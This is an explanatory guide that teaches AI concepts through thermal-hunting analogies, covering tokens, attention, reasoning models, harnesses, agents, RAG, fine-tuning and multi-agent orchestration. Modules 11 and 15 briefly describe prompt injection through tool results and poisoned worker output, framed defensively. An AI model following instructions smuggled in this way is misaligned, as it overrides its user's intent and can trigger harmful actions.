Field Guide to AI — A Thermal Reading

Field Guide · Module 00 · Orientation

A thermal reading of
artificial intelligence

You point a thermal scope at the dark and it doesn't see a hog — it reads heat and predicts shape. Modern AI works the same way: it doesn't know things the way you do, it predicts them from pattern. This guide takes you from that one idea all the way up to building autonomous agents — cold to white-hot, beginner to deep.

◦ The Heat Scale — how to read this guide

COLD · plain-English intuitionWHITE-HOT · the real machinery

Module 01 · The Core Idea Cold

What an AI actually is

Forget the sci-fi. At its heart, today's AI is one surprisingly simple machine doing one thing absurdly well.

A large language model — the thing inside Claude, ChatGPT, all of them — is a next-piece-of-text predictor. You give it some text, and it predicts what comes next. Then it adds that piece, looks at everything again, and predicts the next piece. Over and over.

That's it. That's the whole engine. It's the autocomplete on your phone, except instead of suggesting one word it has read a huge fraction of everything ever written, and it predicts not just the next word but paragraphs, code, arguments, plans — one small chunk at a time.

◦ Field analogy

A trail cam doesn't understand "deer." It has been tuned on millions of frames until it can predict, from a pattern of pixels, "this shape, at this hour, moving this way = deer." The model is the same trick at planetary scale, but for language instead of pixels. It has seen so much text that it has absorbed the statistical shape of how ideas follow one another — and through that, a startling amount about the actual world.

The prediction loop — the single move every LLM repeats to write anything at all.

Three things it is not

Not a database. It doesn't store and retrieve facts in slots. Knowledge is smeared across billions of weights as patterns, which is why it can be fluent and confidently wrong in the same breath.
Not a search engine. Out of the box it isn't looking anything up. It's generating plausible continuations. (Tools can give it search later — that's Module 11.)
Not a person. No goals, no memory between conversations, no understanding in the human sense. It's a very deep pattern-completer that's good enough to look like all three.

↳ In your world

When your Agent Bricks incident agent turns a Tronox Flash Report into clean JSON, no rule engine is parsing fields. The model is predicting "given this messy report, the next characters of a well-formed JSON object are…" — pattern completion pointed at a structured target.

Module 02 · Representation Cool

Tokens & meaning-as-geometry

Before a model can predict text, text has to become numbers. How that happens explains a lot of the model's quirks.

Models don't see letters or words. They see tokens — chunks of text, usually about ¾ of a word. Common words are one token; rare ones get split. hunting is one token; WuTangNAS is several stitched-together pieces.

Every token is turned into an embedding: a long list of numbers (a vector) that places the token as a single point in a vast multi-dimensional space. The whole point of that space is that meaning becomes distance. Tokens with similar meaning sit near each other; unrelated ones sit far apart.

Text → tokens → vectors → points in "meaning space." Geometry does the semantic heavy lifting.

◦ Why this is wild

Because meaning lives in geometry, you can do arithmetic on concepts. The classic result: take the vector for "king," subtract "man," add "woman," and you land right next to "queen." The model never learned that rule — it fell out of the shape of the space, learned purely from reading.

This representation explains real behavior you'll hit:

Token math, not letter math. Ask a model to count the r's in "strawberry" and it may fumble — it sees tokens, not letters. Same reason it's shaky at character-level tricks.
Cost and limits are in tokens. API pricing, context limits, speed — all measured in tokens, not words. Roughly 750 words ≈ 1,000 tokens.
Retrieval runs here. When you "search your journal by meaning" later (RAG, Module 12), you're finding the nearest points in exactly this kind of space.

Under the hood · what's in the vector

An embedding is typically hundreds to thousands of numbers (dimensions). Each dimension isn't a clean human label like "animal-ness" — meaning is distributed across many of them at once. During training the model arranges this space so that whatever directions help it predict the next token become the axes of meaning. Position encoding is also added so the model knows token order, since "creek near deer" and "deer near creek" share tokens but differ in arrangement.

Module 03 · The Architecture Warm

Transformers & attention

One idea — "attention" — is why this generation of AI works at all. It's the T in GPT.

To predict the next token well, the model has to figure out which earlier tokens actually matter. The mechanism that does this is attention: for every token, the model looks across all the other tokens and weighs how relevant each one is, right now, to what it's trying to predict.

◦ Field analogy

Read: "the buck crossed the creek and then it bedded down." To know what "it" means, you glance back and lock onto "buck," not "creek." Attention is that glance — done for every word, against every other word, all at once. The model learns to point each token's attention at whatever helps predict what comes next.

Attention in one picture: each token weighs every other token by relevance.

Stacked into layers

A single attention pass isn't enough. A transformer stacks dozens of these blocks. Each block re-mixes the tokens through attention and then a small processing step, passing richer representations up the stack. The pattern that emerges in practice:

Early layers catch surface stuff — grammar, word shape, "this is a noun."
Middle layers assemble relationships — who did what to whom.
Deep layers hold abstract meaning, intent, and the threads needed to predict what's coming.

A transformer is a tall stack of attention blocks — shallow patterns at the bottom, abstract meaning at the top.

Under the hood · query, key, value (the real mechanic)

Each token produces three vectors: a query ("what am I looking for?"), a key ("what do I offer?"), and a value ("what I'll hand over if chosen"). The model compares one token's query against every token's key to get a relevance score, softmaxes those scores into weights that sum to 1, then blends everyone's values by those weights. That blend is the token's new, context-aware representation.

"Multi-head" attention just runs several of these in parallel, each free to track a different kind of relationship — one head might follow grammatical subjects, another long-range references like our "it → buck." Crucially it's all matrix multiplication, which is why GPUs eat it for breakfast and why this architecture scaled when older sequential ones (RNNs) stalled.

Module 04 · Training Warm

How it learns

Where the "intelligence" comes from: three stages that turn raw text into a helpful assistant.

The model starts as billions of random numbers (parameters, or "weights"). Training is the process of nudging those numbers until the machine gets good at prediction. It happens in three stages, each doing a different job.

The training pipeline. The raw model knows everything and behaves like no one; tuning gives it manners.

◦ Field analogy

Training is sighting in a rifle, a few billion times. Each training example is a shot: the model predicts, you measure how far off it landed from the true next token (the "loss"), and you nudge the weights a hair toward center. One shot teaches almost nothing. Trillions of shots, and the groupings tighten into something that writes code and explains attention. That nudging process is gradient descent — the math just tells you which direction, and how far, to turn each of the billions of knobs.

What "learning" leaves behind

Frozen weights. After training, the numbers are fixed. When you chat with it, it is not learning — it's running. New knowledge only enters through what you put in front of it (context) or tools.
A knowledge cutoff. It only "knows" what existed in its training data. Anything after that date has to be fed in — which is exactly why web search and retrieval exist.
Smeared, not stored. Facts live as patterns across weights, so the model can blend two true things into one false thing with total confidence. This is hallucination, and it's structural, not a bug you can fully patch. (Verification is Module 18.)

↳ In your world

This is why a base model can't know your 10.175.128.x subnet or your Holosun case number. That knowledge was never in training — it has to ride in through context or a tool. Most of "using AI well" is really the craft of getting the right things in front of frozen weights at the right moment.

Module 05 · Running the Model Warm

Inference, sampling & the context window

What actually happens the instant you hit enter — and the single most important constraint to understand.

Using a trained model is called inference. It computes the probability of every possible next token, then has to actually pick one. How it picks is controlled by a dial called temperature.

Temperature is the randomness dial. Low for code and facts, higher for brainstorming and prose.

This is why the same prompt can give different answers, and why a model can sound certain about something it's inventing — it's sampling from a distribution, not reciting a record.

The context window — the one limit that explains everything

The context window is everything the model can see at once: your message, the system instructions, the conversation history, any documents or tool results — all of it, counted in tokens. It is the model's entire working memory. Nothing outside the window exists to the model.

Working memory, not long-term memory. When it's full, the oldest content drops off the edge.

No memory between sessions. A fresh conversation starts blank. Any "memory" feature works by re-injecting saved facts back into the window — it's not the model remembering, it's the harness reminding it.
Bigger isn't free. Larger windows cost more and can dilute focus — bury the key instruction in 100k tokens of noise and the model may lose the thread. Curation beats dumping.
This is the lever you control most. Everything in Modules 8–17 — prompts, tools, RAG, memory, agents — is ultimately about managing what's in this window.

Module 06 · Running the Model Warm

Thinking before answering

Some models are trained to spend extra inference on a private scratchpad before they reply — a second way to buy accuracy, paid in tokens.

There are two ways to make a model smarter. The old lever is train-time scale — more parameters, more data. Reasoning models add a second: test-time compute. Instead of a bigger model, you let the same model do more work at the moment you ask — generating a long private chain of reasoning, then writing the answer you see. Spent well, that compute can let a smaller model match a much larger one on hard problems.

The "thinking" is not a new kind of cognition. It's the same next-token prediction from Module 5, just a lot more of it, aimed inward: more tokens means more chances to break a problem into steps, try an approach, notice a mistake, and correct course before committing. OpenAI calls these reasoning tokens; Anthropic emits thinking content blocks. Either way they're billed as output (you pay for every one), they eat context-window space, and the raw trace is usually hidden or summarized — you see a précis, not the full scratchpad.

◦ Field analogy — this one's yours

Glassing the field vs. snapping the shot. A normal model is the snap shot — fast, fine when the hog's broadside at 40 yards. A reasoning model is glassing before the trigger: settle the AGM Taipan, range it, read the wind, check what's behind the target, confirm it's a hog and not a calf — then shoot. That costs time (latency) and you burn it on every setup whether the shot was easy or not (cost). On a hard, low-light shot it's the difference between a clean kill and a wounded animal lost in the brush. On a 40-yard gimme the glassing changed nothing. Glass when the shot is hard; don't glass a gimme. And glassing carefully isn't the same as hitting — you can range, read, and breathe perfectly and still miss.

Same engine, more tokens spent inward first. You pay for the scratchpad whether the problem needed it or not.

Trained to reason vs. just told to

This is the honest distinction from "think step by step." Prompted chain-of-thought is an inference-time trick on a normal model: you write "let's think step by step" and it produces visible steps. It helps, but the model was never trained to reason — it's pattern-matching the shape of worked examples and can't reliably backtrack or check itself. A trained reasoning model has the chain-of-thought baked in by reinforcement learning: it's rewarded for reaching correct answers on checkable problems (math, code, logic), and over training it learns strategies — self-verification, trying alternatives, catching its own errors mid-stream. DeepSeek-R1 showed these behaviors emerge from RL without being programmed. That's why you don't need to tell a reasoning model to slow down; it already does, and its self-correction is real rather than performed.

The control dial: reasoning effort

You don't just toggle thinking on and off — you meter it. OpenAI exposes reasoning.effort (none → minimal → low → medium → high → xhigh, model-dependent). Anthropic exposes extended thinking with a budget_tokens cap or an adaptive effort where the model decides how much to think per request. Newer models lean adaptive: think hard on the hard parts, barely at all on the easy ones. The tradeoff stated plainly: higher effort buys accuracy on genuinely hard problems, at the cost of more latency (seconds to minutes) and more dollars — and on easy problems it buys little or nothing.

Reach for reasoning

USE IT FOR

SKIP IT FOR

Shape of task

Multi-step math, hard logic, proofs

Lookups, definitions, simple Q&A

Engineering

Tricky debugging, refactors, planning

Formatting, summarizing, rewriting

Stakes / volume

When a wrong answer is expensive

High-volume, latency-sensitive calls

The rule: reasoning buys accuracy on hard problems, and you pay for it whether the problem was hard or not. Reach for it when correctness matters more than speed and the problem actually needs steps. Default to a normal model otherwise.

Under the hood · the harder caveats

Not a correctness guarantee. More thinking raises the odds on reasoning-heavy tasks; it does not make the model right. A reasoning model can think for 30 seconds and still confidently hand you a wrong answer — the trace can rationalize a flawed conclusion just as fluently.

Overthinking is real. Test-time compute does not monotonically improve accuracy. Past a point, extra reasoning can talk a model out of a correct first instinct and degrade its confidence calibration. Bigger budget ≠ better.

Weak on knowledge-bound tasks. When the bottleneck is what the model knows rather than how it reasons, more thinking gives little benefit and can increase hallucination. Thinking can't conjure facts it doesn't have — that's a job for retrieval (RAG, Module 12), not more reasoning tokens.

The trace is summarized. You generally can't fully audit why it concluded something; don't treat the visible "thinking" as a faithful, complete log.

↳ In your world

Reach for effort surgically, not globally. Marked's "Ask Your Journal" is the wrong place — it's retrieval-and-summarize (knowledge-bound), where extra thinking adds cost and can increase hallucination; use a fast model + good RAG. The Tronox extraction's planning step — mapping a messy Flash Report into the schema, reconciling ambiguous fields — is a legitimate place to dial reasoning up, because a wrong structured value flowing to finance is expensive; the bulk extraction stays cheap. On OpenRange / Argus, effort is a cost knob exactly like a per-run token budget: on a Jackery-powered offline node, "think harder" literally means "burn more battery per detection," so routine motion classification wants low/none, reserving thinking for genuinely ambiguous frames.

⌥ Hand to Claude Code

Build a reasoning-effort A/B harness over ~20 real Flash Reports. Run the extraction twice — once at low/none, once at high — and log per report: accuracy vs. a hand-labeled gold set, total tokens (including reasoning tokens from usage / output_tokens_details), latency, and dollar cost. First step: write the gold labels for the 20 samples and a thin runner that flips one effort parameter and records the usage block. The payoff is a number you can feel — "high effort cost 6x and only fixed 2 of 20," or "it fixed the 3 that mattered." Any alerts go through ntfy only.

Module 07 · The Pivot Warm → Hot

The model vs. the thing you talk to

Everything so far described the engine. Now we put a vehicle around it.

A raw LLM is just the prediction engine from Modules 1–6: text in, next token out. By itself it has no persona, no rules, no tools, no memory, no idea it's in a chat. The product you actually use — Claude, ChatGPT, Claude Code, your Marked chatbot — is the model plus a whole apparatus wrapped around it. That apparatus is the harness, and it's where almost all the product engineering lives.

Same engine, both sides. The difference between a curiosity and a product is everything bolted around it.

This distinction is the hinge of the whole guide. From here up, the heat is about systems, not the engine. The engine barely changes between "a chatbot" and "an autonomous agent that refactors your codebase" — the harness is what changes.

Module 08 · The Scaffold Hot

Harnesses

The single most useful concept for a power user. Once you see the harness, you can't unsee it.

A harness is everything wrapped around the raw model to turn a next-token predictor into a useful system. It's the part you, as a builder, actually design and control.

◦ Field analogy — this one's yours

The LLM is the bare thermal sensor. On its own it's a chip that turns heat into a signal — useless in your hands. The harness is the whole scope: the housing, the reticle, the rangefinder, the ballistic calculator, the zeroing, the trigger discipline built into how you use it. Same sensor sits inside a $300 monocular and a $5k AGM — the instrument around it is what makes one deadly. Claude Code, your Marked chatbot, your Agent Bricks agent: all the same sensor, different scopes.

The components of a harness. Designing these well is 90% of building good AI products.

The pieces

System prompt — standing instructions injected before your message: who it is, the rules, the tone, the output format. (This guide's structure, your Marked chatbot's "land manager" persona — all system prompt.)
Tool definitions — the menu of actions it's allowed to call: search, run code, query a DB, fire an ntfy push. (Module 11.)
Memory / state — what survives between turns or sessions, re-loaded into context as needed. (Module 12.)
Context manager — the logic deciding what actually gets shown to the model each call, given the window limit.
The loop — whether the harness calls the model once and stops (chat) or repeatedly toward a goal (agent). (Modules 8–9.)
Guardrails — budgets, max iterations, human approval gates on irreversible actions.

⌥ Hand to Claude Code

A great way to feel a harness is to build the thinnest possible one: a ~40-line script with a system prompt, one tool (say, a function that reads a file), and a single model call. Have Claude Code scaffold tiny-harness/ with the Anthropic SDK, then add a second tool and watch the system prompt do the steering. This makes Modules 8–10 concrete instead of abstract.

Module 09 · The Big Distinction Hot

Chat vs. agents

The question you actually asked. The answer is smaller than it looks — and it lives entirely in the harness.

Same engine. The difference between "a chatbot" and "an agent" is not the model — it's how many times the harness lets the model act, and whether the model gets to decide its own next step.

Chat — you ask, it answers. One model call per turn. You are the loop: you read the reply, decide what's next, and type again. The human is in the loop on every single step.
Agent — you give it a goal and a set of tools, and the harness lets the model loop on its own: decide an action, take it, look at the result, decide the next action — repeating until the goal is met. The human sets the goal and the guardrails; the model drives the steps.

Dimension

CHAT

AGENT

who loops

you do — every turn is yours

the model does — autonomously

model calls

one per message

many per goal, in a loop

acts in the world

only if you wire a tool, one shot

yes — chains tool calls toward a goal

error correction

you catch & re-ask

can see failure & retry itself

best for

thinking, drafting, Q&A, advice

multi-step tasks with checkable results

main risk

low — you gate everything

runs away, compounds errors, acts irreversibly

The whole distinction in one frame: who closes the loop — you, or the model.

It's a spectrum, not a switch

Plain chat → conversation, no actions.
Chat + tools → it can search or run code once to answer better, but you still drive.
Workflow → fixed steps you defined, run in order. Predictable, no improvisation.
Agent → the model chooses the steps and the order to hit your goal.
Multi-agent → several agents with roles, coordinated. (Module 14.)

↳ In your world — where your projects sit on the spectrum

Asking me to draft a vendor email = chat. Your incident-extraction agent (Flash Report in → fixed parse → JSON out) is really a workflow — same path every time, which is exactly what you want for something that feeds finance. Claude Code editing across files, running your tests, reading the failure, fixing, re-running = a true agent. Knowing which one a task should be is half of using AI well.

Module 10 · The Engine of Autonomy Hot

The agent loop

This is the diagram to tattoo on your brain. Every agent — Claude Code, a research agent, your future projects — is some version of this.

An agent is a loop with a goal. The model thinks about what to do, acts by calling a tool, observes the result, and repeats — each result folded back into context so the next thought is better informed. This pattern is often called ReAct: Reason + Act.

THE loop. Think → Act → Observe → Update, checked against the goal each pass.

Why looping is the superpower

A chat model gets one shot. An agent gets to be wrong and recover. It can write code, run it, read the error, fix it, and re-run — exactly what a human engineer does. The loop turns a one-shot guesser into something that converges on a working result. That's why Claude Code can actually fix a failing test suite instead of just suggesting a patch and hoping.

◦ Why looping is also the danger

The same autonomy that recovers from errors can compound them. Loops can spin forever, wander off-goal, burn tokens, or — worst case — take an irreversible action (delete a file, send the wrong email, push bad code). Every serious agent harness therefore has brakes: a max-iteration budget, a token/time budget, clear stopping conditions, and human checkpoints before anything irreversible. Autonomy without brakes isn't powerful, it's a liability.

Stopping conditions — the agent must know "done." Vague goals loop forever; checkable goals ("all tests pass," "file written and validates") terminate cleanly.
Budgets — cap iterations and spend so a confused agent fails cheap instead of expensive.
Checkpoints — gate destructive or external actions behind a human "yes." This is the difference between a helpful agent and a loose cannon.

⌥ Hand to Claude Code

Building a real loop is the best way to internalize this. A clean starter for your world: a small local agent whose only tool is "send ntfy notification," with a goal like "watch this log file and alert me when pattern X appears." It exercises the full Think→Act→Observe cycle with a safe, reversible action and lands squarely on your ntfy-first rule. Natural on-ramp toward the OpenRange / Argus alerting brains.

Module 11 · Touching the World Hot

Tools, function calling & MCP

The "act" in the loop. How a frozen text-predictor reaches out and changes something real.

A model can't natively query your database or push a notification — it only emits text. Tools bridge that gap. You describe a function to the model ("send_ntfy, takes a message"); when it wants to use it, it emits a structured request; your harness runs the real function and feeds the result back into context. That request-and-return protocol is function calling.

Tools = the model's hands. It asks; the harness does; the result comes back as new context.

MCP — the standard that makes this plug-and-play

Early on, every tool had to be wired by hand into every app. MCP (Model Context Protocol) fixes that: it's an open standard for exposing tools and data so any model can plug into any tool without custom glue. Think of it as USB-C for AI — one connector shape, and your Pocket recorder, Gmail, Drive, Supabase, and a dozen others just snap in.

↳ In your world — you're already doing this

Your Pocket voice-recorder MCP is exactly this pattern: Pocket exposes "search my recordings" as an MCP tool, and I can call it to pull a transcript into context, then build learning materials from it. Same with your Gmail/Outlook connectors for batch inbox triage. When you wondered about Omnigent as a meta-harness for coding agents — that's a harness that orchestrates other harnesses, and MCP is the wiring that lets them all share tools.

Under the hood · the security edge of tools

Tools are where an AI stops being a sandbox and starts having real-world reach — which is where risk concentrates. Two failure modes matter. First, prompt injection: content a tool pulls in (a web page, an email, a file) can contain text trying to hijack the model's instructions. Treat tool output as untrusted data, never as commands. Second, irreversible actions: a tool that deletes, sends, pays, or changes permissions deserves a human checkpoint, because an agent's confident mistake executes instantly. The rule of thumb: read-only tools can run free; world-changing tools get a gate.

Module 12 · Feeding the Window Hot

Context engineering, RAG & memory

The model only knows what's in its window (Module 5). So the real art is deciding what goes in it.

Since the weights are frozen and the window is finite, everything useful comes down to one craft: getting the right information in front of the model at the right moment. That's context engineering, and it has two big tools — retrieval and memory.

RAG — Retrieval-Augmented Generation

Instead of relying on what the model memorized, RAG fetches relevant material at question time and stuffs it into the window before the model answers. The fetch uses the embedding space from Module 2: your question becomes a vector, and you grab the nearest chunks of your own documents.

RAG: retrieve relevant chunks first, then answer from them. How "chat with your docs" works.

↳ In your world

Marked's "Ask Your Journal" is RAG: your harvest logs and stand notes get embedded into Supabase, a question retrieves the most relevant entries, and the model answers grounded in your seasons — not generic deer facts. RAG is also the honest fix for hallucination and stale knowledge: instead of trusting the model's memory, you hand it the source and say "answer from this."

Memory — persistence across the gaps

The model forgets everything between sessions. Memory is a harness feature that stores durable facts and selectively re-injects them into context when relevant — so it can "remember" your subnet, your vendors, your projects. Key mental model: the model isn't remembering; the harness is reminding. Memory is a store on the side, loaded back into the window on demand.

Context window = short-term working memory, this conversation only, wiped at the end.
Memory store = long-term notes the harness keeps and re-surfaces — like the running picture I keep of your stack so you don't re-explain it every time.
RAG store = a searchable body of documents pulled in on demand by relevance.

◦ The discipline

More context is not better context. A window stuffed with marginally-related junk dilutes the model's focus and can bury the one instruction that mattered. Good context engineering is curation, not accumulation: the fewest, most relevant tokens that fully specify the task. When a long agent run gets polluted with dead ends, the right move is often to start a fresh window with a clean summary — not to keep piling on.

Module 13 · The Decision Warm → Hot

Fine-tuning vs. RAG

Now that you know what RAG is, here's when to reach for it versus changing the model itself.

RAG changes what the model knows; fine-tuning changes how the model behaves. Pick by asking which of those your problem actually is — and most of the time the honest answer is "reach for retrieval first."

They get confused because both are sold as "customize the AI on your data," but they're completely different levers. RAG leaves the frozen weights alone (Module 4): at question time it fetches the relevant facts from an external store (Module 12) and drops them into the context window. Knowledge lives outside the model; you swap it freely. Fine-tuning continues training the model on your examples so its default behavior shifts — tone, format, the shape of an answer, a niche task it does reliably without being re-instructed. Knowledge baked into weights; changing it means training again.

◦ Field analogy

Open-book vs. closed-book exam. RAG is an open-book exam: the model looks every fact up in your binder at question time — so the binder can be today's incident reports, and the answer cites the page. Fine-tuning is a closed-book exam: the model studied until the way it answers is second nature, but whatever wasn't in the studying isn't in its head. RAFT is studying and then sitting the open-book exam — it learned how to read your binder and ignore the irrelevant pages. You don't cram facts the night before; you keep facts in the binder and fine-tune the test-taking technique. On the scope: fine-tuning is re-flashing the firmware's image processing; RAG is the rangefinder feeding a live number into the ballistic calc each shot. You'd never re-flash firmware to account for today's wind — you feed today's wind in live.

Two levers, one decision: change what it knows (RAG) or how it behaves (fine-tune) — and the strong systems do both. Default: start with RAG; don't fine-tune to add facts.

Which lever, when

Reach for RAG when facts are fresh / changing (prices, policies, this week's stand notes), proprietary to you (your subnet, your journal, your medallion tables), or you need grounding and citations traceable to a source. Auditability is structurally a RAG property — weights can't cite.
Reach for fine-tuning when you need a consistent format, style, or voice every time without re-prompting, a narrow task done reliably (emit exactly this JSON shape) where a long prompt is brittle, or latency / cost wins — bake behavior in so each call needs a shorter prompt.

The decision question, front and center: is my problem about what the AI knows, or how it behaves? Knowledge → RAG. Behavior → fine-tuning. And they're not rivals — the strong pattern is fine-tune for behavior and layer RAG for facts. Berkeley's RAFT formalizes it: a model fine-tuned specifically to read retrieved documents — including learning to ignore irrelevant "distractor" chunks — beats either approach alone on domain-specific QA.

Failure modes — credibility lives here

Fine-tuning to "add knowledge." The seductive mistake. Research (Gekhman et al., EMNLP 2024) shows models learn fine-tuning examples containing new facts much slower than facts they already half-know — and as those new-knowledge examples get learned, they linearly increase the model's tendency to hallucinate. The field's takeaway: models acquire facts in pretraining; fine-tuning teaches them to use what they have, not to learn new facts. Want it to know something new? That's RAG's job.
Stale indexes. RAG is only as fresh as its store. An index not re-embedded when source data changes will confidently serve last quarter's price. RAG moves the freshness problem out of the weights — it doesn't delete it.
Retrieval quality dominates. Garbage in, garbage out: no model rescues a bad fetch. Most "RAG is broken" pain is a retrieval problem — bad chunking, weak embeddings, distractor docs — not a generation problem. Debug the retriever before you blame the model.
Fine-tuning the freshness away. Choosing fine-tuning for facts that change means re-training on every change — slow, expensive, and you still inherit the hallucination risk. Almost always the wrong trade.

2025/26 default: start with RAG (and good prompting). Fine-tune only once you've proven RAG can't deliver the behavior you need — it handles the large majority of "use our data" asks faster, cheaper, and reversibly.

Under the hood · flavors of fine-tuning

Full fine-tuning — update every weight. Most powerful, most expensive, needs real GPU infra, and risks "catastrophic forgetting" of general ability.

LoRA / PEFT — freeze the base model, train a tiny set of low-rank adapter matrices (often <0.5% of parameters). 10–20× less memory while keeping ~90–95% of full-tune quality; adapters can be merged back so there's no extra inference latency. QLoRA adds quantization to fit on a single consumer-ish GPU. This is what "fine-tuning" usually means in practice today.

Instruction tuning — the Module-4 stage that turned a raw predictor into an assistant; your task-specific fine-tune is the same machinery aimed narrower.

↳ In your world

Marked's "Ask Your Journal" is the textbook RAG case — your harvest logs change every season and the answer must be grounded in your entries with the entry as the source. Fine-tuning a model on your journal would be the classic mistake: slow learning, blended hallucinated "facts," and a retrain every time you log a hunt. Where fine-tuning could actually earn its place is the Tronox incident-extraction workflow — if the long prompt forcing the exact Flash-Report → JSON shape ever gets brittle or token-heavy at volume, a small LoRA that bakes in the output shape (behavior, not facts) is legitimate; the incident content still rides in via context. And your medallion Silver/Gold tables are a natural retrieval corpus for an "ask the warehouse" assistant — governed, changing, proprietary — never something you'd freeze into weights.

⌥ Hand to Claude Code

Add an honest A/B inside Marked's "Ask Your Journal." Keep the existing RAG path, then wire a deliberately wrong comparison: answer from the base model with no retrieval — same question, side by side. First step: add a ?mode=noretrieval flag to the Ask-Your-Journal endpoint that skips the Supabase vector search and asks the model cold. Log both answers. You'll feel the difference — the no-retrieval path inventing plausible stand-and-wind "facts" is the hallucination-from-missing-knowledge failure made concrete, and the cleanest proof of why "fine-tune to add knowledge" is a trap.

Module 14 · Systems of Agents White-hot

Multi-agent orchestration

When one loop isn't enough: split the work across specialists with a coordinator.

A single agent juggling a huge task fills its window with too many concerns and starts dropping threads. The fix mirrors how you'd run a crew: break the job into roles, give each a clean context, and have a coordinator stitch the results together.

Orchestrator-worker pattern: a coordinator delegates to specialists, each with its own clean loop.

Common patterns

Orchestrator-worker — a lead plans and farms subtasks to workers, then merges results. (How deep-research systems fan out across sources.)
Critic / debate — one agent produces, another reviews and pushes back, raising quality through friction.
Pipeline — agents in sequence, each transforming the previous one's output, like a Bronze→Silver→Gold medallion flow but with reasoning at each stage.

◦ The tradeoff — don't reach for this too early

Multi-agent is more capable and dramatically more expensive, slower, and harder to debug — errors hide between agents, costs multiply, and coordination itself can fail. The discipline: start with the simplest thing that works. One good prompt beats a chat-with-tools that beats a single agent that beats a multi-agent swarm — reach up the ladder only when the rung below genuinely can't carry the task.

↳ In your world

This is the frontier you're poking at with Databricks agentic experiments and Omnigent (a meta-harness coordinating coding agents). The same orchestrator-worker shape maps onto a future Tronox build: a planner agent that routes "extract this incident," "reconcile this logistics cost," "draft this IBP note" to specialized sub-agents — but only once each single-agent piece is proven solid on its own. How these agents actually get wired — and how they share what they know without poisoning each other — is the next module.

Module 15 · Systems of Agents White-hot

Orchestration & shared context

You decided one agent isn't enough — now the hard part isn't the agents, it's the wiring between them.

Module 14 answered should you go multi-agent. This answers how it's wired: which shape routes the work, and how agents that each have their own separate context window — possibly running in different harnesses — share what they've learned without flooding, contradicting, or poisoning each other.

The topologies — pick the shape that matches the work

Module 14 named three patterns in passing. Here's the fuller toolkit, and the rule for when each fits is always the same question: how coupled are the subtasks? Independent work fans out; dependent work must serialize or share state.

Orchestrator-worker (hub-and-spoke). A lead plans, spawns workers, synthesizes their returns — the workhorse Module 14 diagrams. Fits breadth-first, parallelizable work ("find every board member across 20 companies"). The lead holds the plan and the only complete picture; the lead decides it has enough and stops spawning.
Hierarchical / recursive. Workers are themselves orchestrators with their own workers — a tree. Fits deep decomposition, but cost compounds with depth, so cap the depth explicitly.
Sequential pipeline. Agents in a line, each transforming the previous one's output (extract → reason → draft → check). Fits a fixed dependency order. The most deterministic shape — closest to a data pipeline — and the easiest to debug, because state flows one direction.
Parallel fan-out / fan-in. Sibling subtasks dispatched at once, results merged — the orchestrator-worker's parallel core. Fits when latency matters and subtasks are independent. The fan-in (merge) step is where the hard problems live: dedup, conflict resolution, provenance.
Blackboard. No one boss routes the work. Specialists all watch a shared workspace; each contributes when the current state matches what it knows how to do; a lightweight control loop picks who goes next. Fits ill-defined problems with no fixed solution path. Coordination is indirect — agents never talk to each other, only to the board — which makes it the cleanest model for the shared-state problem below.
Debate / critic. One agent produces, another adversarially reviews. Going a level past Module 14: the critic must have a different context/prompt than the producer or it just rubber-stamps — the same reason an eval judge must be validated separately (Module 16).

Shared context — the genuinely hard part

The uncomfortable truth: each subagent has its own context window, and they cannot see into each other's. A worker never witnesses the lead's reasoning or its siblings' transcripts — it gets only what was explicitly handed to it, and the lead gets back only what the worker chose to return. There is no shared mind; there is only what you wire through the seams. Three ways agents share state, coldest to hottest:

Message passing (handoff). The orchestrator sends a distilled task (objective, format, boundaries, the few facts it needs) and gets back a distilled result — never the raw transcript. You pass conclusions, not transcripts. Raw transcripts are huge and full of dead ends; the sender summarizes at the boundary. Dominant mode, and the one most prone to "lost in translation" loss.
Shared memory / scratchpad / blackboard. A common store all agents read and write. Lets many agents converge on one evolving artifact without N×N messaging. The discipline that makes it safe: a single writer per slot (or append-only with provenance), so two agents don't clobber each other. Reads are cheap; uncoordinated writes are where it corrupts.
Shared store / artifact. A durable external object — a file, a row, a doc, a task record — that outlives any single agent's context and serves as the handoff medium, especially across harnesses. Agent A in one harness writes the artifact; Agent B in another reads it. The artifact is the shared context; neither agent shares its internal memory.

Agents never share a mind — only what crosses the seam. Pass the call, not the feed; one writer to shared state; treat a peer's output as data, not commands.

Across harnesses, and why opacity is correct

When agents live in different harnesses (or vendors/frameworks), there's no shared process, no shared window, no implicit anything — they share context only through an explicit boundary protocol. The emerging standard split, stated plainly:

MCP connects an agent to its tools (agent → tool) — Module 11.
Agent-to-agent protocols (e.g. A2A) connect agents to each other (agent → agent), and their first design principle is opacity: agents exchange tasks, messages, and artifacts — distilled, structured handoffs — without exposing internal memory, tools, or chain-of-thought. That opacity isn't a limitation; it's the correct shape. You hand over the call, not the whole sensor feed.

Summarization at boundaries is load-bearing, not optional. Every handoff is a lossy compression, so good systems make the summary structured (schema'd fields, not prose) and keep a pointer back to the source so a claim can be re-checked.

◦ Field analogy — the spotter/shooter pair

In a two-person thermal hunt the spotter is glassing a wide field and you're on the rifle. You do not share a sensor feed — you can't see through the spotter's scope, he can't see your reticle. What crosses between you is one tight, distilled call: "Hog, far tree line, 180, quartering left." That call is the handoff — a structured summary, not the raw stream. If the spotter narrated every warm rock and deer (the full transcript), you'd drown in it and miss the shot. You pass the call, not the feed — exactly A2A opacity, and exactly why subagents return distilled findings, not their context windows. And the trust angle lands: a bad range call propagates straight into a missed shot, with full confidence.

Provenance & trust on merge

When the orchestrator merges several agents' outputs, it is ingesting text it didn't write — and an LLM can't tell instructions-from-you from instructions-hidden-in-data. A worker that read a poisoned web page can return output carrying a smuggled command; if the lead treats merged worker output as trusted instructions, that's prompt injection between your own agents. This is the same hazard as Module 17, now turned inward. So: tag every contribution with where it came from, treat cross-agent output as data, not commands, and gate any consequential action behind verification — the least-privilege, cut-a-trifecta-leg posture from Module 17, applied to the seams inside your swarm.

Coordination failure modes — where it bites

Context fragmentation. No agent holds the whole picture; the synthesis is only as good as the distilled returns. Detail dies at every boundary.
Duplicated / conflicting work. Vague task boundaries make two workers do the same thing or reach contradictory conclusions. (Anthropic's system hit exactly this; the fix was detailed delegation — objective, format, boundaries.)
Lost-in-translation handoffs. The boundary summary drops the one nuance that mattered; the receiver confidently builds on a misread.
Runaway fan-out cost. Multi-agent burns ~15× the tokens of plain chat (single agents already ~4×). Spawning subagents for a one-line question, or searching endlessly for info that doesn't exist, are real early failures.
No clean termination. Without explicit budgets the swarm doesn't know when "enough" is — orchestrators over-invest, recursion never bottoms out, debate never converges.
Error propagation. One worker's wrong fact, passed up as a clean conclusion, gets laundered into the final answer with false confidence — same shape as poisoned provenance, minus the adversary.
